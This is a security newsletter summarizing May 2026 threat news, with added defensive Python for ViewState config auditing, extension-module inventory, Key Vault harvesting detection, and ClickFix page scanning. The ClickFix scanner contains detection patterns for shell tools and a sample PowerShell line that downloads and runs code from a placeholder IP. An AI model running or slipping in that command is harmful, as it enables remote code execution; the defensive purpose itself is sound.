
Daily Security Briefing #265
- DjediTech
- Security, Newsletter
- May 25, 2026
Chinese PhaaS growth, KnowledgeDeliver vulnerability exploited, Netherlands seizes servers, and AI model security risks…
Executive Summary
Threat actors keep adapting to takedowns and disruptions. This week's developments include the maturing of Chinese-language phishing-as-a-service (PhaaS) offerings, in-the-wild exploitation of a critical ViewState deserialization flaw in the KnowledgeDeliver LMS for unauthenticated remote code execution, and the seizure of 800 servers by Dutch authorities along with the arrest of two hosting-company owners. Separately, concern is growing over AI model security risks, with Anthropic's restricted Claude Mythos model apparently headed for Claude Code.
Top Articles
2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services Google Threat Intelligence Group analyzed a dozen current PhaaS offerings in the Chinese underground, all of them mature services and many likely tied intricately to the broader criminal ecosystem. These services lower the barrier to entry for Chinese cyber criminals. Google Cloud Blog
Exploitation of KnowledgeDeliver via ViewState Deserialization Vulnerability A critical vulnerability in KnowledgeDeliver allowed unauthenticated Remote Code Execution (RCE) through ViewState deserialization, the ASP.NET mechanism that turns the __VIEWSTATE form field back into server-side objects; when the server accepts a ViewState it did not sign, or the signing key is known to the attacker, a crafted field becomes code execution. An unknown threat actor used this access to inject malicious code into the LMS, with the goal of compromising sensitive data. Google Cloud Blog
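The practical check a defender wants after an item like this is whether their own ASP.NET applications are configured so that ViewState is signed with a unique key. The following is an added example, not code from the article and not KnowledgeDeliver's own code: it audits the `<pages>` and `<machineKey>` elements of a web.config. Both configs are constructed and the keys are shortened dummies.

```python
"""Audit an ASP.NET web.config for settings that make ViewState deserialization
attacks easier. Added example: not code from the article and not KnowledgeDeliver's
own code; both configs below are constructed and the keys are shortened dummies."""
import xml.etree.ElementTree as ET

WEAK_WEB_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="false" viewStateEncryptionMode="Never" />
    <machineKey validationKey="0123456789ABCDEF" decryptionKey="FEDCBA9876543210"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

HARDENED_WEB_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
    <machineKey validationKey="0123456789ABCDEF" decryptionKey="FEDCBA9876543210"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""


def audit_viewstate(config_xml: str) -> list:
    """Return (severity, message) findings for the <pages> and <machineKey> elements."""
    findings = []
    root = ET.fromstring(config_xml)
    pages = root.find("./system.web/pages")
    machine_key = root.find("./system.web/machineKey")

    if pages is not None:
        # MAC validation is what stops a client from submitting an arbitrary object graph.
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append(("HIGH", 'enableViewStateMac="false": the server accepts an unsigned '
                             "__VIEWSTATE, so any client can submit an arbitrary serialized object graph"))
        if pages.get("viewStateEncryptionMode", "Auto").lower() == "never":
            findings.append(("MEDIUM", 'viewStateEncryptionMode="Never": ViewState contents are '
                             "readable by the client (disclosure, not RCE by itself)"))

    if machine_key is not None:
        validation = machine_key.get("validation", "HMACSHA256").upper()
        if validation == "MD5":
            findings.append(("HIGH", 'machineKey validation="MD5": obsolete MAC algorithm'))
        elif validation in ("SHA1", "3DES", "AES"):
            findings.append(("MEDIUM", f'machineKey validation="{validation}": legacy setting, '
                             "use HMACSHA256 or stronger"))
        # Static keys are legitimate (web farms need them) but must be unique and secret.
        for attr in ("validationKey", "decryptionKey"):
            if not machine_key.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(("INFO", f"{attr} is static: fine for web farms, but it must be "
                                 "unique to this deployment; a key copied from documentation, "
                                 "samples or another site lets an attacker sign a malicious ViewState"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(f"== {name} ==")
        for severity, message in audit_viewstate(cfg):
            print(f"[{severity}] {message}")
```

A clean result from this audit is necessary but not sufficient: MAC validation only helps while the machineKey stays secret, and an application-level deserialization bug such as the one reported here is fixed by the vendor patch, not by configuration. Treat the static-key finding as a prompt to confirm the key was generated for this deployment rather than copied from a sample.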
Netherlands Seizes 800 Servers, Arrests 2 for Aiding Cyberattacks Authorities in the Netherlands have arrested the co-owners of two related Internet hosting companies for operating IT infrastructure used by Russia to carry out cyberattacks. The two men were the focus of a 2025 KrebsOnSecurity story about how their hosting companies had assumed control over the technical infrastructure of Stark Industries Solutions. KrebsOnSecurity
InvisibleFerret Malware Uses .pyd and .so Files to Evade Script Detection A North Korea-linked threat group, Void Dokkaebi, has upgraded its malware delivery by shipping the Python-based InvisibleFerret as compiled extension modules (.pyd on Windows, .so on Linux and macOS) instead of Python source. Static analysis and signature-based tools tuned for Python scripts see only native binaries, which makes the payload harder to detect. GBHackers
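A compiled extension module that no package manager installed is exactly the kind of artifact this technique leaves behind. The following is an added example, not code from the article or from any vendor: it inventories .pyd and .so files under a site-packages style directory and reports those that no installed distribution's RECORD file claims, or whose bytes no longer match the RECORD hash. The directory tree it scans is constructed in a temporary directory with fake ELF and PE headers.

```python
"""Inventory compiled Python extension modules (.pyd on Windows, .so on Linux/macOS)
under a site-packages style directory and report the ones no installed distribution
accounts for, or whose bytes no longer match the RECORD hash. Added example, not code
from the article or from any vendor; the directory tree is constructed in a temp dir."""
from __future__ import annotations

import base64
import hashlib
import tempfile
from importlib.metadata import distributions
from pathlib import Path

EXT_SUFFIXES = (".pyd", ".so")          # 'x.cpython-312-x86_64-linux-gnu.so' still ends with .so
MAGIC = {b"MZ": "PE", b"\x7fELF": "ELF", b"\xcf\xfa\xed\xfe": "Mach-O"}


def record_digest(data: bytes) -> str:
    """sha256 in the urlsafe-base64-without-padding form used by RECORD files."""
    return base64.urlsafe_b64encode(hashlib.sha256(data).digest()).rstrip(b"=").decode()


def audit_extensions(site_dir: Path) -> list:
    """Return dicts for every compiled module that is untracked or tampered."""
    expected = {}                        # resolved path -> FileHash (or None) from RECORD
    for dist in distributions(path=[str(site_dir)]):
        for entry in dist.files or []:
            expected[Path(entry.locate()).resolve()] = entry.hash

    findings = []
    for path in site_dir.rglob("*"):
        if not path.is_file() or not path.name.endswith(EXT_SUFFIXES):
            continue
        data = path.read_bytes()
        fmt = next((v for k, v in MAGIC.items() if data.startswith(k)), "unknown")
        key = path.resolve()
        if key not in expected:
            status = "orphan"            # no RECORD claims it: dropped in, not pip-installed
        else:
            h = expected[key]
            if h is not None and h.mode == "sha256" and h.value != record_digest(data):
                status = "hash-mismatch" # installed module replaced after the fact
            else:
                continue
        findings.append({"path": path.relative_to(site_dir).as_posix(),
                         "format": fmt, "status": status})
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree() -> Path:
    """Constructed sample: one legitimate distribution plus two dropped-in modules."""
    root = Path(tempfile.mkdtemp(prefix="extaudit-"))
    native = b"\x7fELF" + b"\0" * 28    # fake ELF header, not a real module
    (root / "foo").mkdir()
    (root / "foo" / "_native.so").write_bytes(native)
    info = root / "foo-1.0.dist-info"
    info.mkdir()
    (info / "METADATA").write_text("Metadata-Version: 2.1\nName: foo\nVersion: 1.0\n")
    (info / "RECORD").write_text(
        f"foo/_native.so,sha256={record_digest(native)},{len(native)}\n"
        "foo-1.0.dist-info/METADATA,,\n"
        "foo-1.0.dist-info/RECORD,,\n")
    (root / "helper.so").write_bytes(b"\x7fELF" + b"\0" * 28)   # untracked ELF
    (root / "loader.pyd").write_bytes(b"MZ" + b"\0" * 30)       # untracked PE
    return root


if __name__ == "__main__":
    tree = build_sample_tree()
    for finding in audit_extensions(tree):
        print(finding)
    # Overwrite the legitimately installed module and audit again: now it is reported too.
    (tree / "foo" / "_native.so").write_bytes(b"\x7fELF" + b"\xff" * 28)
    print(audit_extensions(tree))
```

Point it at each interpreter's site-packages and at any vendored directories an application adds to sys.path. Modules installed with `pip install -e` or copied in by hand will show as orphans, so review the list rather than alerting on it blindly; shared libraries named `lib*.so.N` are not matched by the suffix filter and need a separate pass.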
Italian Authorities Dismantle CINEMAGOAL App Enabling Unauthorised Access to Streaming Platforms Italian law enforcement agencies have dismantled a sophisticated piracy operation centered around the CINEMAGOAL application, which enabled unauthorized access to premium streaming platforms. The operation was led by the Financial Police in Ravenna under the direction of the Bologna Public Prosecutor’s Office. GBHackers
Telegram Channels Become Marketplaces for Verified Bank and Fintech Mule Accounts Threat actors are exploiting Telegram channels and dark web forums to sell verified bank accounts and fintech wallets. According to recent threat intelligence from KELA, cybercriminals are building resilient laundering infrastructures using stolen identities, AI-assisted onboarding, and compromised accounts. CyberPress
25th May – Threat Intelligence Report Check Point’s Threat Intelligence Bulletin highlights the latest discoveries in cyber research for the week of 25th May. TOP ATTACKS AND BREACHES include a breach at 7-Eleven, where ShinyHunters claimed responsibility and said it stole more than 600,000 Salesforce records containing personal data. Check Point Research
Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos A weekly recap of recent cybersecurity events, covering exploited Linux flaws, Defender 0-days, router botnets, and supply chain incidents. The Hacker News
Hackers Abuse Azure RBAC Permissions To Steal Key Vault Secrets Microsoft Threat Intelligence identified a campaign by the threat actor Storm-2949 focused on large-scale data exfiltration from Microsoft 365 and Azure environments. The attackers used legitimate cloud management tooling and the Azure role-based access control (RBAC) permissions already held by compromised identities to move laterally and read Key Vault secrets. CyberPress
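Because the secret reads in this kind of campaign are authorized by RBAC, there is no failed-access signal; the detectable pattern is an identity enumerating and reading many distinct secrets in a short window. The following is an added example, not code from the article or from Microsoft: it runs that detection over Key Vault audit log records. The records are constructed and simplified (real AzureDiagnostics rows carry more fields and a flattened identity claim), and the threshold is an assumption to tune; Key Vault diagnostic logging must be enabled on the vault for these records to exist at all.

```python
"""Flag an identity that harvests Key Vault secrets, from Key Vault audit
(diagnostic) log records. Added example, not code from the article or from
Microsoft; the records are constructed and simplified, the threshold is an
assumption, and logging must be enabled on the vault for any of this to exist."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
MAX_DISTINCT_SECRETS = 5          # assumption: tune to the environment's baseline


def _event(t, principal, ip, vault, op, secret=None):
    """Constructed record with the fields the detection needs."""
    return {"time": t, "identity": principal, "callerIpAddress": ip,
            "resourceId": f"/subscriptions/sub-1/resourceGroups/rg/providers/"
                          f"Microsoft.KeyVault/vaults/{vault}",
            "operationName": op,
            "id": f"https://{vault}.vault.azure.net/secrets/{secret}" if secret else None}


# Constructed sample: a service identity re-reading its one connection string (normal),
# then a user identity listing a vault and pulling every secret from two vaults.
SAMPLE_EVENTS = [
    _event("2026-05-20T09:00:00Z", "svc-billing", "10.1.0.4", "kv-prod", "SecretGet", "db-conn"),
    _event("2026-05-20T09:05:00Z", "svc-billing", "10.1.0.4", "kv-prod", "SecretGet", "db-conn"),
    _event("2026-05-20T09:10:00Z", "svc-billing", "10.1.0.4", "kv-prod", "SecretGet", "db-conn"),
    _event("2026-05-20T11:00:00Z", "john@contoso.com", "203.0.113.7", "kv-prod", "SecretList"),
    _event("2026-05-20T11:00:10Z", "john@contoso.com", "203.0.113.7", "kv-prod", "SecretGet", "db-conn"),
    _event("2026-05-20T11:00:20Z", "john@contoso.com", "203.0.113.7", "kv-prod", "SecretGet", "api-key"),
    _event("2026-05-20T11:00:30Z", "john@contoso.com", "203.0.113.7", "kv-prod", "SecretGet", "smtp-pass"),
    _event("2026-05-20T11:00:40Z", "john@contoso.com", "203.0.113.7", "kv-prod", "SecretGet", "storage-key"),
    _event("2026-05-20T11:00:50Z", "john@contoso.com", "203.0.113.7", "kv-backup", "SecretGet", "cert-pfx"),
    _event("2026-05-20T11:01:00Z", "john@contoso.com", "203.0.113.7", "kv-backup", "SecretGet", "backup-key"),
]


def _parse(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def detect_secret_harvesting(events, window=WINDOW, threshold=MAX_DISTINCT_SECRETS):
    """Sliding window per identity; report the window with the most distinct secrets."""
    by_principal = defaultdict(list)
    for e in events:
        if e["operationName"] in ("SecretGet", "SecretList"):
            by_principal[e["identity"]].append(e)

    alerts = []
    for principal, evs in by_principal.items():
        evs.sort(key=lambda e: _parse(e["time"]))
        best, start = None, 0
        for end, e in enumerate(evs):
            while _parse(e["time"]) - _parse(evs[start]["time"]) > window:
                start += 1
            win = evs[start:end + 1]
            secrets = {w["id"] for w in win if w["operationName"] == "SecretGet"}
            if len(secrets) >= threshold and (best is None or len(secrets) > best["distinct_secrets"]):
                best = {
                    "principal": principal,
                    "distinct_secrets": len(secrets),
                    "vaults": sorted({w["resourceId"].rsplit("/", 1)[-1] for w in win}),
                    "enumerated": any(w["operationName"] == "SecretList" for w in win),
                    "ips": sorted({w["callerIpAddress"] for w in win}),
                    "start": evs[start]["time"], "end": e["time"],
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_secret_harvesting(SAMPLE_EVENTS):
        print(alert)
```

The same logic translates directly into a scheduled KQL query over the AzureDiagnostics table. Pair it with an Activity Log rule on role assignments that grant Key Vault data-plane roles, since the write that hands out the permission usually precedes the reads by hours.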
Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks Threat actors are exploiting a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript that fuels ClickFix attacks, in which the page copies a command to the visitor's clipboard and instructs them to paste and run it. According to QiAnXin XLab, the activity involves exploitation of CVE-2026-26980 (CVSS score: 9.4). The Hacker News
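Site owners can check their own rendered pages for the injected script rather than wait for a visitor report. The following is an added example, not code from the article, QiAnXin XLab or the Ghost project: it extracts inline scripts and script sources from page HTML, decodes base64 literals so an encoded command is scanned too, and flags the ClickFix combination of a clipboard write plus a shell command or paste instruction. The two pages and the indicator lists are constructed and are assumptions to tune.

```python
"""Scan page HTML for injected ClickFix-style JavaScript: a script that writes a
command to the clipboard and tells the visitor to paste it into a Run box or shell.
Added example, not code from the article, QiAnXin XLab or the Ghost project; the
two pages below are constructed and the indicator lists are assumptions to tune."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

CLIPBOARD = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
COMMANDS = re.compile(r"powershell|mshta|cmd(?:\.exe)?\s*/c|\biwr\b|\biex\b|"
                      r"curl\s+[^|]*\|\s*(?:ba)?sh|bash\s+-c", re.I)
LURE = re.compile(r"win\s*\+\s*r|windows\s*key|run\s+dialog|press\s+enter|"
                  r"verify\s+you\s+are\s+human|terminal", re.I)
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


class _ScriptCollector(HTMLParser):
    """Collect inline script bodies and external script src values."""
    def __init__(self):
        super().__init__()
        self.inline, self.srcs, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True
                self.inline.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data


def _decoded_literals(js):
    """Yield base64 literals decoded as UTF-8 and as UTF-16LE (PowerShell -EncodedCommand)."""
    for m in B64_LITERAL.finditer(js):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError
            continue
        yield raw.decode("utf-8", "ignore")
        yield raw.decode("utf-16-le", "ignore")


def scan_page(html, allowed_script_hosts=()):
    """Return findings: inline ClickFix patterns and external scripts off the allowlist."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for js in parser.inline:
        hits = set()
        for text in [js, *_decoded_literals(js)]:
            if CLIPBOARD.search(text):
                hits.add("clipboard-write")
            if COMMANDS.search(text):
                hits.add("shell-command")
            if LURE.search(text):
                hits.add("paste-lure")
        # A copy button alone writes the clipboard; require a second indicator.
        if "clipboard-write" in hits and len(hits) >= 2:
            findings.append({"kind": "inline-clickfix", "indicators": sorted(hits),
                             "snippet": js.strip()[:80]})
    for src in parser.srcs:
        host = urlparse(src).netloc
        if host and host not in allowed_script_hosts:
            findings.append({"kind": "external-script", "host": host, "src": src})
    return findings


# Constructed samples. The payload is base64-encoded at build time, as injected scripts often are.
PAYLOAD_B64 = base64.b64encode(b'powershell -w hidden -c "iwr http://198.51.100.9/x | iex"').decode()

CLEAN_PAGE = """<html><body>
<script src="/assets/built/casper.js"></script>
<pre class="copy" data-code="ls -la">ls -la</pre>
<script>document.querySelectorAll('.copy').forEach(b =>
  b.addEventListener('click', () => navigator.clipboard.writeText(b.dataset.code)));</script>
</body></html>"""

INFECTED_PAGE = f"""<html><body>
<script src="/assets/built/casper.js"></script>
<script src="https://cdn.example-bad.test/v.js"></script>
<script>var c = atob("{PAYLOAD_B64}");
navigator.clipboard.writeText(c);
document.body.insertAdjacentHTML('beforeend',
  '<div class="ov">To verify you are human, press Win+R, then Ctrl+V and Enter.</div>');</script>
</body></html>"""

if __name__ == "__main__":
    print("clean:", scan_page(CLEAN_PAGE))
    print("infected:", scan_page(INFECTED_PAGE, allowed_script_hosts=("cdn.jsdelivr.net",)))
```

Run it against the HTML the server actually returns to an anonymous visitor, not the theme files on disk, since an injection stored in the CMS database or in a code-injection setting only shows up in rendered output. The clean sample keeps a legitimate copy-to-clipboard button from firing the rule.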
Anthropic’s restricted Claude Mythos model may be coming to Claude Code Anthropic appears to be preparing a public rollout of the Mythos model, which it announced in April as a restricted model because of the major security risks it poses to private and public software. BleepingComputer
AI Transparency: This newsletter uses AI to curate, rank, and summarize cybersecurity content from leading industry blogs. All articles link directly to original authors. Executive summaries are AI-generated based on article content. I curate the sources and deliver the digest—the original authors deserve the credit for their excellent work.